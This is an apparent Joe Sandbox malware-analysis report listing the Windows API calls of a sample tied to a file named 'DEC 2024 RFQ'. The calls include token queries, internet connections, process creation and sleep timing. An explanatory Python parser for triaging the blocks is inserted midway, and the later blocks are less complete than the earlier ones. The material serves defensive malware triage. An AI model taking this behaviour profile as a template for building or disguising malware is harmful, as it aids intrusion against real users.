                                                                                                                        • Part of subcall function 0007810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00078157
                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 000786A3
                                                                                                                      • _memcmp.LIBCMT ref: 000786C6
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000786FC
                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00078703
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1592001646-0
                                                                                                                      • Opcode ID: 51d22a5c775c1d482e27962aad1f0648b5767424035e3330ac66f35f504492c0
                                                                                                                      • Instruction ID: 05deaec266112b92b0fd97960efbc982552ecb0530e822edd0d3856a693bcc32
                                                                                                                      • Opcode Fuzzy Hash: 51d22a5c775c1d482e27962aad1f0648b5767424035e3330ac66f35f504492c0
                                                                                                                      • Instruction Fuzzy Hash: 09216971E80109EBDB10DFA4D949BEEB7F8EF45304F15C059E548AB241DB38AE05CBA4
                                                                                                                      APIs
                                                                                                                      • __setmode.LIBCMT ref: 000409AE
                                                                                                                        • Part of subcall function 00025A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00087896,?,?,00000000), ref: 00025A2C
                                                                                                                        • Part of subcall function 00025A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00087896,?,?,00000000,?,?), ref: 00025A50
                                                                                                                      • _fprintf.LIBCMT ref: 000409E5
                                                                                                                      • OutputDebugStringW.KERNEL32(?), ref: 00075DBB
                                                                                                                        • Part of subcall function 00044AAA: _flsall.LIBCMT ref: 00044AC3
                                                                                                                      • __setmode.LIBCMT ref: 00040A1A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 521402451-0
                                                                                                                      • Opcode ID: 55dc58cf1a02fec356aa3737a2496b26585e77a0cf6c1052691abaca2a56d675
                                                                                                                      • Instruction ID: d216e1dc17a80a1cb113931a3939e434a2c302a9c9732f26ca3f9afeaa197256
                                                                                                                      • Opcode Fuzzy Hash: 55dc58cf1a02fec356aa3737a2496b26585e77a0cf6c1052691abaca2a56d675
                                                                                                                      • Instruction Fuzzy Hash: C61136B19046046FDB14B7B4AC47AFE77A89F42321F644069F204A7183EE745C5287AE
                                                                                                                      APIs
                                                                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 000917A3
                                                                                                                        • Part of subcall function 0009182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0009184C
                                                                                                                        • Part of subcall function 0009182D: InternetCloseHandle.WININET(00000000), ref: 000918E9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Internet$CloseConnectHandleOpen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1463438336-0
                                                                                                                      • Opcode ID: 112308d022f541c350b2716a65b7fc44924a99feaa913f5133ae1bfb71935b75
                                                                                                                      • Instruction ID: 16296de6651a1d462f8c5bfa5c8711bef99a12c1859c52df183c0c7acbd93f3b
                                                                                                                      • Opcode Fuzzy Hash: 112308d022f541c350b2716a65b7fc44924a99feaa913f5133ae1bfb71935b75
                                                                                                                      • Instruction Fuzzy Hash: 44218031304606BFEF229FA09C41BFBBBE9FB49750F10442AF95196651DB719811BBA0
                                                                                                                      APIs
                                                                                                                      • GetFileAttributesW.KERNEL32(?,000AFAC0), ref: 00083A64
                                                                                                                      • GetLastError.KERNEL32 ref: 00083A73
                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00083A82
                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,000AFAC0), ref: 00083ADF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2267087916-0
                                                                                                                      • Opcode ID: 4c297766492563d14bc82f18b62df8deeb5de83d6f85d7367d6a82476f8fe0b3
                                                                                                                      • Instruction ID: 65b7e7a5f4adeb738fe6fcc8e0bc1475068a47a4493e2b3b523c2b29440478dc
                                                                                                                      • Opcode Fuzzy Hash: 4c297766492563d14bc82f18b62df8deeb5de83d6f85d7367d6a82476f8fe0b3
                                                                                                                      • Instruction Fuzzy Hash: 7A2183745086029F8714EF68D8818AB77E4BF96764F104A2DF4D9C72A2DB31DE46CB43
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0007F0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0007DCD3,?,?,?,0007EAC6,00000000,000000EF,00000119,?,?), ref: 0007F0CB
                                                                                                                        • Part of subcall function 0007F0BC: lstrcpyW.KERNEL32(00000000,?,?,0007DCD3,?,?,?,0007EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0007F0F1
                                                                                                                        • Part of subcall function 0007F0BC: lstrcmpiW.KERNEL32(00000000,?,0007DCD3,?,?,?,0007EAC6,00000000,000000EF,00000119,?,?), ref: 0007F122
                                                                                                                      • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0007EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0007DCEC
                                                                                                                      • lstrcpyW.KERNEL32(00000000,?,?,0007EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0007DD12
                                                                                                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,0007EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0007DD46
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrcmpilstrcpylstrlen
                                                                                                                      • String ID: cdecl
                                                                                                                      • API String ID: 4031866154-3896280584
                                                                                                                      • Opcode ID: 84384a1267ca4d9f0001d9e594dd8f36eef0e820ee4bbc0036d810c9a277428e
                                                                                                                      • Instruction ID: 1e84f5cbd71ccd9b94b13ad06b10a7f67fcfa2c4534dbb1de1bbcca49ade49d4
                                                                                                                      • Opcode Fuzzy Hash: 84384a1267ca4d9f0001d9e594dd8f36eef0e820ee4bbc0036d810c9a277428e
                                                                                                                      • Instruction Fuzzy Hash: 6411E13A600305EBDB249F74CC459BA37B8FF46350B40802AE90ACB2A1EB759C10C7A8
                                                                                                                      APIs
                                                                                                                      • _free.LIBCMT ref: 00055101
                                                                                                                        • Part of subcall function 0004571C: __FF_MSGBANNER.LIBCMT ref: 00045733
                                                                                                                        • Part of subcall function 0004571C: __NMSG_WRITE.LIBCMT ref: 0004573A
                                                                                                                        • Part of subcall function 0004571C: RtlAllocateHeap.NTDLL(016E0000,00000000,00000001,00000000,?,?,?,00040DD3,?), ref: 0004575F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap_free
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 614378929-0
                                                                                                                      • Opcode ID: c0f3d9c7117d0f532c3a525d340c49cdb7136584eb549f60e6583674708f57b6
                                                                                                                      • Instruction ID: 64ae5fae1d2dcfa207454601e54ac7c2c653224019d3598f1d30355c2cc1f8e9
                                                                                                                      • Opcode Fuzzy Hash: c0f3d9c7117d0f532c3a525d340c49cdb7136584eb549f60e6583674708f57b6
                                                                                                                      • Instruction Fuzzy Hash: 4811C4B2900E11AFDB312F70AC597AF3FD89B05363B104939FD449A152DF348944979C
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 000244CF
                                                                                                                        • Part of subcall function 0002407C: _memset.LIBCMT ref: 000240FC
                                                                                                                        • Part of subcall function 0002407C: _wcscpy.LIBCMT ref: 00024150
                                                                                                                        • Part of subcall function 0002407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00024160
                                                                                                                      • KillTimer.USER32(?,00000001,?,?), ref: 00024524
                                                                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00024533
                                                                                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0005D4B9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1378193009-0
                                                                                                                      • Opcode ID: d692ffc10703aba676216f42b0283f78554f9b35b28a05181c51e6f0cb8379a9
                                                                                                                      • Instruction ID: f9b9b2493ba4d6b0f2db277d44d5caeb25671208eabc3b18457edbc752bbd1f9
                                                                                                                      • Opcode Fuzzy Hash: d692ffc10703aba676216f42b0283f78554f9b35b28a05181c51e6f0cb8379a9
                                                                                                                      • Instruction Fuzzy Hash: 7721C570904BA49FF772CB249855BEBBBEC9B06319F04049EEBDA5A142C3746988CB51
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00025A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00087896,?,?,00000000), ref: 00025A2C
                                                                                                                        • Part of subcall function 00025A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00087896,?,?,00000000,?,?), ref: 00025A50
                                                                                                                      • gethostbyname.WSOCK32(?,?,?), ref: 00096399
                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 000963A4
                                                                                                                      • _memmove.LIBCMT ref: 000963D1
                                                                                                                      • inet_ntoa.WSOCK32(?), ref: 000963DC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1504782959-0
                                                                                                                      • Opcode ID: 97a3bdf2f1941e61753b5e150ad40f069b59b05fcc8b945b12deee312fffd387
                                                                                                                      • Instruction ID: 9b2fcad6a03c762c2be8ea94c72edb67667ae532578744268534b7d99f7b969c
                                                                                                                      • Opcode Fuzzy Hash: 97a3bdf2f1941e61753b5e150ad40f069b59b05fcc8b945b12deee312fffd387
                                                                                                                      • Instruction Fuzzy Hash: 74118E32500509AFCF00FBA4ED46CEEB7B8AF05310B044165F506B7162DF35AE04DBA5
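The function blocks in this listing (an "APIs" list with direct calls and "Part of subcall function" entries, a "Memory Dump Source" line giving the dump file and load offset, and a "Similarity" section with the API ID and fuzzy hashes) are what an analyst pivots on when triaging a sample like this one. The parser below is an added example, not part of the Joe Sandbox report or of Joe Sandbox's own tooling. It assumes only the line layout visible on this page; the sample text is constructed from three of the blocks above, and the set of modules it treats as network-facing (WININET, WINHTTP, WSOCK32, WS2_32) is the example's own choice, not something the report defines.

```python
"""Parse Joe Sandbox IDA-plugin function blocks and pivot on their API usage.

Added example (not from the report). Assumes the block layout shown on the
page: bullet lines of the form
    Name.MODULE(args), ref: ADDR
optionally prefixed with "Part of subcall function ADDR:", followed by
"Memory Dump Source" and "Similarity" key/value lines.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: three blocks copied from this report, trimmed to the
# fields the parser uses.
SAMPLE = """APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 000917A3
  • Part of subcall function 0009182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0009184C
  • Part of subcall function 0009182D: InternetCloseHandle.WININET(00000000), ref: 000918E9
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
Similarity
• API ID: Internet$CloseConnectHandleOpen
• API String ID: 1463438336-0
• Instruction Fuzzy Hash: 44218031304606BFEF229FA09C41BFBBBE9FB49750F10442AF95196651DB719811BBA0
APIs
• gethostbyname.WSOCK32(?,?,?), ref: 00096399
• WSAGetLastError.WSOCK32(00000000), ref: 000963A4
• _memmove.LIBCMT ref: 000963D1
• inet_ntoa.WSOCK32(?), ref: 000963DC
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
Similarity
• API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
• API String ID: 1504782959-0
• Instruction Fuzzy Hash: 74118E32500509AFCF00FBA4ED46CEEB7B8AF05310B044165F506B7162DF35AE04DBA5
APIs
• _free.LIBCMT ref: 00055101
  • Part of subcall function 0004571C: RtlAllocateHeap.NTDLL(016E0000,00000000,00000001,00000000,?,?,?,00040DD3,?), ref: 0004575F
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
Similarity
• API ID: AllocateHeap_free
• API String ID: 614378929-0
• Instruction Fuzzy Hash: 4811C4B2900E11AFDB312F70AC597AF3FD89B05363B104939FD449A152DF348944979C
"""

API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)
KV_RE = re.compile(r"^\s*•\s*(?P<key>[^:]+):\s*(?P<val>.*?)\s*$")
SECTIONS = {"Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity", "Strings"}
# Example's own choice of modules worth flagging as network-facing.
NETWORK_MODULES = {"WININET", "WINHTTP", "WSOCK32", "WS2_32"}


@dataclass
class ApiCall:
    name: str
    module: str
    ref: str                      # call-site address as printed in the report
    args: list[str]
    subcall_of: Optional[str]     # callee address when marked "Part of subcall"


@dataclass
class FunctionBlock:
    apis: list[ApiCall] = field(default_factory=list)
    meta: dict[str, str] = field(default_factory=dict)


def parse_blocks(text: str) -> list[FunctionBlock]:
    blocks: list[FunctionBlock] = []
    section = None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":             # every block starts with its API list
            blocks.append(FunctionBlock())
            section = "apis"
            continue
        if stripped in SECTIONS:
            section = stripped
            continue
        if not blocks:
            continue
        cur = blocks[-1]
        if section == "apis":
            m = API_RE.match(line)
            if m:
                args = [a for a in (m["args"] or "").split(",") if a]
                cur.apis.append(ApiCall(m["name"], m["module"], m["ref"], args, m["sub"]))
            continue
        m = KV_RE.match(line)
        if m:
            cur.meta[m["key"]] = m["val"]
    return blocks


def dump_source(block: FunctionBlock) -> dict[str, str]:
    """Split 'file, Offset: X, based on PE: true' into its fields."""
    parts = [p.strip() for p in block.meta.get("Source File", "").split(",")]
    info = {"file": parts[0]}
    for p in parts[1:]:
        k, _, v = p.partition(":")
        info[k.strip()] = v.strip()
    return info


def modules(block: FunctionBlock, include_subcalls: bool = True) -> set[str]:
    return {a.module for a in block.apis if include_subcalls or a.subcall_of is None}


def network_blocks(blocks: list[FunctionBlock]) -> list[FunctionBlock]:
    return [b for b in blocks if modules(b) & NETWORK_MODULES]


def direct_refs(block: FunctionBlock) -> list[str]:
    return sorted(a.ref for a in block.apis if a.subcall_of is None)


def fuzzy_index(blocks: list[FunctionBlock]) -> dict[str, str]:
    """Instruction fuzzy hash -> API ID, for pivoting across other reports."""
    return {b.meta["Instruction Fuzzy Hash"]: b.meta["API ID"]
            for b in blocks if "Instruction Fuzzy Hash" in b.meta}


if __name__ == "__main__":
    for b in network_blocks(parse_blocks(SAMPLE)):
        print(b.meta["API ID"], sorted(modules(b)), direct_refs(b))
```

Keeping direct calls separate from "Part of subcall" entries matters when you pivot: the subcall entries repeat the callee's APIs under every caller, so counting them as the caller's own behaviour inflates how many functions appear to touch a given module. The instruction fuzzy hash is the field to carry into other reports when looking for the same function in related samples.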
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00078B61
                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00078B73
                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00078B89
                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00078BA4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 4ab6638ffb3d28b0cb565a02b1ce8cea6e5131574b5a976362fad4948502012b
APIs
  • Part of subcall function 00022612: GetWindowLongW.USER32(?,000000EB), ref: 00022623
• DefDlgProcW.USER32(?,00000020,?), ref: 000212D8
• GetClientRect.USER32(?,?), ref: 0005B5FB
• GetCursorPos.USER32(?), ref: 0005B605
• ScreenToClient.USER32(?,?), ref: 0005B610
Similarity
• API ID: Client$CursorLongProcRectScreenWindow
• String ID:
• API String ID: 4127811313-0
• Opcode ID: 3c4e4199a9c5b60cee00ae8453a7b9ab83c5c9cbbcb3f701731df2ae12c27ee7
APIs
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0007FCED,?,00080D40,?,00008000), ref: 0008115F
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,0007FCED,?,00080D40,?,00008000), ref: 00081184
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0007FCED,?,00080D40,?,00008000), ref: 0008118E
• Sleep.KERNEL32(?,?,?,?,?,?,?,0007FCED,?,00080D40,?,00008000), ref: 000811C1
Similarity
• API ID: CounterPerformanceQuerySleep
• String ID:
• API String ID: 2875609808-0
• Opcode ID: 626dccef5a54e3a3dedc5e3f85c926bbeb5da88ef0c81356433c0f1fea819abf
APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0007D84D
• LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0007D864
• RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0007D879
• RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0007D897
Similarity
• API ID: Type$Register$FileLoadModuleNameUser
• String ID:
• API String ID: 1352324309-0
• Opcode ID: e2c9c23cd88f67651e171af3d89d63097e6b51535279c4eb2935bbee59671bfd
APIs
Similarity
• API ID: __cftoe_l__cftof_l__cftog_l__fltout2
• String ID:
• API String ID: 3016257755-0
• Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
APIs
• GetWindowRect.USER32(?,?), ref: 000AB2E4
• ScreenToClient.USER32(?,?), ref: 000AB2FC
• ScreenToClient.USER32(?,?), ref: 000AB320
• InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 000AB33B
Similarity
• API ID: ClientRectScreen$InvalidateWindow
• String ID:
• API String ID: 357397906-0
• Opcode ID: 866191c62215719c204f46333c83fdc8b2ecbecf72af22345ffdc9f41f8953c9
APIs
• _memset.LIBCMT ref: 000AB644
• _memset.LIBCMT ref: 000AB653
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,000E6F20,000E6F64), ref: 000AB682
• CloseHandle.KERNEL32 ref: 000AB694
Similarity
• API ID: _memset$CloseCreateHandleProcess
• String ID:
• API String ID: 3277943733-0
• Opcode ID: ec61f45834dad6c4b85f5b1af16536528d8ee51ac20fa73abb02b670307ceb17
APIs
• EnterCriticalSection.KERNEL32(?), ref: 00086BE6
  • Part of subcall function 000876C4: _memset.LIBCMT ref: 000876F9
• _memmove.LIBCMT ref: 00086C09
• _memset.LIBCMT ref: 00086C16
• LeaveCriticalSection.KERNEL32(?), ref: 00086C26
Similarity
• API ID: CriticalSection_memset$EnterLeave_memmove
• String ID:
• API String ID: 48991266-0
• Opcode ID: a85a0cd7bb8c1e75a8c62e6f7632d240887f90c44a2204f87a82fea453e74aea
APIs
• GetSysColor.USER32(00000008), ref: 00022231
• SetTextColor.GDI32(?,000000FF), ref: 0002223B
• SetBkMode.GDI32(?,00000001), ref: 00022250
• GetStockObject.GDI32(00000005), ref: 00022258
• GetWindowDC.USER32(?,00000000), ref: 0005BE83
• GetPixel.GDI32(00000000,00000000,00000000), ref: 0005BE90
• GetPixel.GDI32(00000000,?,00000000), ref: 0005BEA9
• GetPixel.GDI32(00000000,00000000,?), ref: 0005BEC2
• GetPixel.GDI32(00000000,?,?), ref: 0005BEE2
• ReleaseDC.USER32(?,00000000), ref: 0005BEED
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1946975507-0
                                                                                                                      • Opcode ID: af22768186939208123b7c804fb5820d84489fc3113ff7d534c80dc3cc5af368
                                                                                                                      • Instruction ID: 107c06cdb828c8cb7ce98acdbf13a50352f72ee49a9d655bbaa57b6f8a2763a6
                                                                                                                      • Opcode Fuzzy Hash: af22768186939208123b7c804fb5820d84489fc3113ff7d534c80dc3cc5af368
                                                                                                                      • Instruction Fuzzy Hash: A4E03932504645EAEF615FA4FC0D7E83B50EB06332F148376FA69480E187764984DB22
APIs
• GetCurrentThread.KERNEL32 ref: 0007871B
• OpenThreadToken.ADVAPI32(00000000,?,?,?,000782E6), ref: 00078722
• GetCurrentProcess.KERNEL32(00000028,?,?,?,?,000782E6), ref: 0007872F
